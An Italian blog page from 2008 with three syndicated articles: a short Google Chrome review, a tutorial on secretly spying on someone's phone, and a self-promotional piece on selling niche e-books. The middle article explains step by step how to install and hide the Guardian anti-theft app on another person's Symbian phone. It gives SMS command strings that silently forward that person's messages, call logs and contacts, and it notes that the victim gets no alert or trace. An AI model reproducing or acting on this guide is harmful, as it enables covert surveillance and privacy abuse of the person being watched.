mercoledì 24 settembre 2008

Google Chrome ma Microsoft non trema

Si nota immediatamente una vera e propria semplicità nell'utilizzo senza trascurare la dinamicità delle opzioni avanzate. Per i meno esperti sarà difficile capirne le differenze con i più rinomati Firefox, Internet Explorer, Safari e Opera, ma i più esperti cosa notano?

Appena installato ecco che subito si apre una finestra per importare Preferiti, Password e altre impostazioni del nostro browser predefinito non manca l' interazione con il motore javascript sviluppato in linguaggio open source che sembra essere il vero fiore all'occhiello di questo software prendendo spunto anche dal Mozilla e Tracemonkey.

Leggendo tra le righe di comunicati stampa degli addetti ai lavori notiamo come Larry Page, Sergey Brin e Sundard Pichai(fondatori e Presidenti del colosso Google) abbiano inteso la tecnologia del browser uno dei punti chiave per il successo dando merito anche a Mozilla ma non tralasciando una critica “tutti facciamo molte cose on line e il Web si è evoluto in modo drastico... ma la tecnologia sottostante del browser è ancora molto simile a quella originale di Netscape".

Ma in realtà cosa pensano chi di  browser ci mastica ogni giorno? Abbiamo intervistato Filannino Michele, esperto programmatore e laureto alla facoltà di Informatica di Bari. 
"Google Chrome è sicuramente un'idea interessante e degno di nota dal momento che è un'azienda molto importante e di grandi possibilità ma ritengo che per il momento non ci siano intenzioni serie di business. Si nota che in questi giorniGoogle ha semplicemente annunciato di stare al passo con gli altri e penso sia semplicemente una di quelle aziende che è condannata ad innovare. Tra l'altro possiede il 30% di Mozilla Foundation ed hanno una liquidità spaventosa credo quindi  che per il momento ha fatto semplicemente capire ai competitor che lui c'è"

About the Author

Linea Web Agency - Ufficio Stampa

venerdì 19 settembre 2008

Cellulare Spia Che Intercetta SMS: Grande Fratello?

Dalle telecamere lungo le strade alle frequenze dei telefonini, ognuno di noi può essere tenuto sotto controllo senza saperlo.
Spiati, controllati e tenuti sotto osservazione minuto per minuto. Oggi, esattamente come la famosa trasmissione televisiva di mediaset, il Grande Fratello (suonerie sfondi foto del grande fratello) è tutto intorno a noi. Dalle telecamere dei semafori alle frequenze dei telefonini. E la privacy? Vip o meno, siamo tutti sotto l'occhio attento di qualche sottospece di investigatore privato.

Ma giocare all' l'investigatore al giorno d'oggi è alla portata di tutti, prelevare dal cellulare di una persona (ovviamente senza che se ne accorga), SMS inviati e ricevuti, chiamate fatte e ricevute o la Rubrica, è diventata una semplice operazione che possiamo fare standocene comodamente seduti sul nostro divano. Come fare? Il primo passo è essere in possesso un cellulare con sistema operativo Symbian Series 60.

Il secondo passo è utilizzare il software cellulare Guardian (http://www.symbian-toys.com/guardian.aspx?lang=it-it) il sistema antifurto definitivo per i terminali Symbian Series60.
Ad ogni accensione del cellulare Guardian si occupa di stabilire se la sim inserita e' autorizzata, in caso negativo notifica l'avvenuto cambio sim inviando un sms ad un numero telefonico stabilito in precedenza.
Inoltre fornisce funzionalita' di controllo remoto del cellulare, consentendo (tra le altre cose) di cancellare le proprie foto/rubrica/sms/video/audio in caso di smarrimento o furto del cellulare (vedere sezione Plugins).
Come visto il software cellulare Guardian è in realtà un sistema antifurto per cellulari Symbian Series 60, tuttavia, utilizzando delle precise impostazioni, possiamo utilizzarlo per creare un cellulare spia in pochi passi, spostati nella seconda linguetta e poi sulla voce Destinatario.

Dopo aver scaricato Guardian, scompatta l'archivio in una cartella del tuo computer. Se il cellulare spia è un Nokia ed hai installato PC Suite sul tuo computer, per installare il programma, collega il cellulare al PC e fai doppio click sul file estratto, chiamato guardian05.sis.

Nella finestra che si apre, fai click su Si e poi su Ok. Nel cellulare, fai click due volte di seguito su Si e poi altre due volte di seguito su OK. Hai appena terminato di installare Guardian sul cellulare spia! Per farlo funzionare, spegni e accendi il tuo cellulare.
Dopo aver acceso il cellulare, premi il tasto Menu, spostati in Preferiti e apri Guardian. Fai click sul menu Opzioni e seleziona Supporto. Inserisci il codice donazione ottenuto via e-mail e fai click su OK. Adesso dobbiamo passare a configurare Guardian.
Seleziona il menu Opzioni e poi Cambia. Devi ora selezionare dalla rubrica del cellulare che si deve spiare il contatto a cui mandare gli SMS e la Rubrica. Possiamo aggiungere alla rubrica temporaneamente il nostro numero di cellulare e poi cancellarlo.
Impostata questa voce, spostati in quella successiva: Esegui Comandi SMS. Fai click sul menu Opzioni, seleziona Cambia e poi fai click su Si. Ora spostati in Password, fai click sul menu Opzioni e seleziona Cambia.
Scrivi ed annota da qualche parte la password che digiti: ti servirà per accedere al cellulare spia di nascosto. Abbiamo quasi finito! Stancante creare un cellulare spia, eh? Fai click su Esci e poi su Si. Adesso, devi cambiare SIM e rimettere quella che sarà usata abitualmente nel cellulare da spiare. Perchè l'avevi cambiata, vero?

Non appena cambi SIM, il programma Guardian sparirà dalla cartella Preferiti, dove si trovano i programmi del tuo cellulare, e sarà pronto a mandarti tutte le informazioni che desideri. Non abbiamo però ancora finito. Non appena cambi la SIM ed accendi il cellulare, ricevi un SMS al numero di cellulare impostato in Guardian che ti dice che la SIM è stata cambiata. Questo accade ogni volta che accendi il cellulare spia.

Per disattivare questo comportamento, manda al cellulare spia da un altro cellulare questo SMS (scrivi i comandi in maiuscolo!):

//PASSWORDIMPOSTATAPRIMA//CONFIG//STOPSMS

Fatto questo, se vuoi ricevere gli SMS ricevuti/inviati, la lista delle chiamate effettuate/ricevute e i contatti della Rubrica aggiunti DOPO che è stato installato il programma Guardian, invia questo SMS al cellulare spia:

//PASSWORDIMPOSTATAPRIMA//FORWARD//DATA=NEW INBOX=999 OUTBOX=999 INCALLS=999 OUTCALLS=999 CONTACTS=999

Seleziona il menu Opzioni e poi Cambia. Devi ora selezionare dalla rubrica del cellulare che si deve spiare il contatto a cui mandare gli SMS e la Rubrica. Possiamo aggiungere alla rubrica temporaneamente il nostro numero di cellulare e poi cancellarlo.

DA NOTARE che tutti gli sms inviati e ricevuti dal programma non saranno notificati in nessuna maniera all'utente, nessuna icona, nessuna illuminazione, nessun suono, nessuna vibrazione, nulla visibile nei messaggi inviati/spediti/in uscita ed ovviamente nessuna traccia nel registro.

Compatibilità: cellulari Nokia: 3230 / 6260 / 6600 / 6620 / 6630 / 6670 / 6680 / 6681 / 6682 / 7610 / n70 / n72 / n90
Panasonic: X700 / X800
Samsung: SGH-D720 / SGH-D730
Lenovo: P930

Siamo o non siamo tutti al grande fratello?

Alberto Avieri di suoneria gratis

 

Fonte: Article Marketing Italia

rigati

Come Scrivere Un Infoprodotto Di Nicchia E Guadagnare On Line

Scrivere un ebook non deve essere cosi facile se tanti rinunciano come ho visto fare in questi mesi.Tutti pensano che scrivere un infoprodotto sia facile poi come in ogni cosa si tratta di passare ore al tavolo a crivere e iniziano le difficoltà

Il marketing di nicchia può essere la soluzione.Scrivere un infoprodotto di nicchia non è poi cosi complicato se siamo appassionati dell'argomento e se sappiamo come scrivere.Il mio metodo è questo.

Dopo aver scelto la nicchia sulla base del metodo delle parole chiave che trovate spiegato nei dettagli e con dei trucchi molto astuti sul mio libro http://infoprodottidinicchia.com vi ritroverete con molto materiale riunito frutto delle ricerche e delle letture che avrete fatto per capire di cosa scriverete.A questo punto scrivete un sommario in dieci capitoli e una o due appendici e con un introduzione e un conclusioni.

Per ogni capitolo scrivete 4 sottocapitoli e per ogni sottocapitolo due punti principali.

Quando avrete finito questa operazione avrete già la metà del libro scritta e senza accorgervene anzi dovrete ora fare la parte piu facile e cioè completare i punti che avete messo in evidenza e vedrete i capitoli formarsi da soli.

Il marketing di nicchia vi permette di guadagnaresu ben 5 correnti di reddito che vanno dalla vendita vera e peorpia del vostro ebook a Adsense di Google agli spazi pubblicitari sulla vostra Newsletter per finire conle vendite di prodotti in affiliazione correlati con la nicchia scelta e di prodotti fisici se la nicchia lo permette.

Pensate per esempio se scrivete di alimentazione o fitness quante cose parallele potete vendere specie in dropshipping.Usate un negozio ebay per promuovere il vostro libro rivendendo i prodotti in dropshipping che sarete in grado di trovare vi ritroverete con 5 pagine web altamente indicizzate praticamente gratuite anzi se fate bene il blog e attirate traffico sul negozio andrete in profitto anche con quello oltre a vendere parecchie copie del vostro ebook

Insomma il marketing di nicchia e gli infoprodotti se integrati intelligentemente cositutiscono un vero business su Internet ma possibile che la maggior parte della gente si spaventi a scrivere un paio d'ore la giorno?Un paio d'ore al giorno e in un mese il vostro infoprodotto di nicchia e bell'e pronto.Io ne ho scritti 4 che trovate alla pagina http://infoprodottidinicchia.com e ne ho venduti a decine,

Ora se volete saperne di piu non vi resta che leggere i miei ebook e andare sul mio blog a http://dropshipitalia.blogspot.com dove troverete ben 6 video sugli infoprodotti di nicchia e due

Informazioni sull'autore

Sono un consulkente di marketing.Ho scritto 4 ebook e sto finendo il 5 per la Armando Curcio Editore. Visita il mio blog http://dropshipitalia.blogspot.com
Sito: http://www.infoprodottidinicchia.com

Fonte: Article Marketing Italia

paolo orlando